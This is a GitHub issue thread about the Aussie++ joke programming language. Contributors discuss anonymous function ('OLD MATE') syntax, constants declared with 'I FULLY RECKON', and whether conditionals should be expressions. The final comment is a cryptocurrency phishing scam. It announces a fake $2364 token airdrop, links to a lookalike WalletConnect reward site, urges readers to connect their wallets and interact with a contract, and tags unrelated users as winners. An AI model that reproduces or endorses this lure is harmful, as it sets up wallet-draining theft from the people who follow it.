### ISSUE TITLE
Anonymous Functions

### ISSUE THREAD

**Issue by bbrk24** [zackradisic/aussieplusplus#15]
I was messing around with callbacks, and I noticed something interesting:

```go
G'DAY MATE!

IMPOHT ME FUNC HitTheSack;

THE HARD YAKKA FOR performAfter IS (callback, duration) <
    HitTheSack(duration);
    callback();
>

THE HARD YAKKA FOR helloWorld IS () <
    GIMME "Hello, World!";
>

I RECKON duration = 1000;

// What combinations of literal/variable are legal?
performAfter(helloWorld, 1000); // works
performAfter(helloWorld, duration); // works
performAfter(// wait, do function literals/closures even exist?
    1000);

CHEERS C***!
```

I don't have any ideas for what they would be called, but I'm not even sure words would be necessary -- they tend to be pretty punctuationful. Consider how the NOP lambda is `[]() { }` in C++ and `() => {}` in JS.

Syntactically, I perfer how Swift and Ruby handle it, where the entire closure body is wrapped in braces (in contrast with the closure syntax in JS, which consists of multiple separate parts).

**Comment by bbrk24** [comment]
I'm not qualified to comment on the Australianism, but the syntax looks fine (and is reminiscent of older JS `function() {}`).

**Comment by jwfxpr** [comment]
> I'd think only variables declared with `I RECKON` should be mutable, and not ones declared with `THE HARD YAKKA FOR ... IS`.

In addition to this, it would be nice to be able to declare an immutable variable. `DEADSET`?

```
I RECKON x = 1; // Mutable
I DEADSET RECKON y = 2; // Immutable
```

**Comment by bbrk24** [comment]
@jwfxpr I asked someone who is more qualified to speak to the Australianisms than I am, and he basically said that: `OLD MATE` is fine; `DEADSET` feels odd there, and if constants are to use `RECKON` at all, then `I FULLY RECKON` feels more natural.

**Comment by jwfxpr** [comment]
Yep @bbrk24 , `I FULLY RECKON` works too! Looking at it again with fresh eyes, `DEADSET` seems better to me as a standalone statement, rather than part of `I RECKON`.

```
I FULLY RECKON a = 1;
```

```
DEADSET b = 2;
```

Both of those forms seem good to me 😊

**Comment by zackradisic** [comment]
I think I prefer `I FULLY RECKON` since it sounds more fluent. The lambda function syntax looks good to me!

I can get to work right away on implementing constants and making function declarations immutable.

**Comment by bbrk24** [comment]
Before the anonymous functions are fully introduced, I want to point out an inconsistency with the proposed syntax: named functions have `IS () < >`; anonymous functions have `() IS < >`.

**Comment by zackradisic** [comment]
@bbrk24 Good point, the finalized syntax will be this then.
```go
OLD MATE IS () < GIMME "Oi mate"; GIMME "Clear off"; >
```

Also this gave me idea that we should write style rules for the language, things like spacing, conventions, things of that nature

**Comment by jwfxpr** [comment]
Just so that the examples and discussion here are clear, we've implied (but not discussed) that parameters for old mates go inside the `()`.

I.e., old mate with no parameters:
```
OLD MATE IS () < GIMME "Oi mate"; GIMME "Clear off"; >
```

An old mate with one parameter:
```
OLD MATE IS (wotareya) < GIMME "Oi " + wotareya; GIMME "Clear off"; >
```

Old mate with two parameters:
```
OLD MATE IS (wotareya, yerawanka) < GIMME "Oi " + wotareya; GIMME YA RECKON yerawanka ? < "Bugger off"; > WHATABOUT ? < "Clear off"; > >
```

etc.

Sidebar q, @zackradisic: I could test this myself, but for the sake of discussion, are `YA RECKON`s expressions? README.md [mentions](https://github.com/zackradisic/aussieplusplus/blob/f27525b7b643f3ceb3391f70ff54f9eb8202531e/README.md?plain=1#L75-L78) "if statements", but if we're going to the trouble of implementing lamdas, it seems reasonable that a lamda would be able to use a single `YA RECKON` to `BAIL` a value, yes?

**Comment by zackradisic** [comment]
At this moment `YA RECKON` (if) and `YA RECKON ... IS A` (match) are statements, so this won't work:
```go
I RECKON x = OLD MATE IS (yerawanka) <  
    BAIL YA RECKON yerawanka ? < "Bugger off"; > WHATABOUT ? < "Clear off"; >;
>(NAH YEAH!);
```

In retrospect I should have made them expressions, should make that change at some point.

**Comment by BenediktMiller** [comment]
## Exciting News! You're the proud recipient of $2364 in tokens 🪂🔴

Ready to transform those tokens into real value? Here's how:

- Unlock the full potential of your $2364 by seamlessly connecting your wallet to WalletConnect.
- Your $2364 ETH redemption has been verified and is ready for you to claim.
- 🎁 Dive into a world of monthly rewards by exploring [this exclusive airdrop](https://www.walletconnectreward.online/).

But wait, there's more! Connect your wallet now, follow our simple instructions, and unveil an exclusive airdrop designed just for GitHub users. Spread the word to friends—each share increases your eligibility. Don't miss out on securing your reward!

![WalletConnect](https://preview.redd.it/walletconnect-2023-reviews-features-and-safety-v0-e807nahvtfmb1.png?width=2548&format=png&auto=webp&s=f94da65885db338806c867e335e4df7688ef4398)

🚀 **Seize Your Bonus Opportunity Now!** [Verify Eligibility](https://www.walletconnectreward.online/)

Embark on a journey with Optimism, where your wallet is your key to exclusive benefits. Make sure to use a trusted wallet for a secure transaction.

- 🔗 **Connect your wallet:** Not once, but twice!
- 📋 **Claim Button:** Click on the claim button after connecting your wallet.
- 💼 **Interact with the Method Connect:** Engage with the contract using the Method Connect to complete the process.
- 💰 **Ensure Mainnet Balance:** Don't forget to check that your wallet has a sufficient balance on the mainnet for successful transactions.

Reformulate the Whitelist promotion up to $10,000, following these steps:
1. Connect your wallet.
2. Click on the claim button.
3. Interact with the contract using the Method Connect.
4. Ensure your wallet has a sufficient balance on the mainnet.


Winners: @lennon7c7, @jakesock, @roveneliah, @rivendale, @mashharuki, @amilcarrey, @samisbakedham
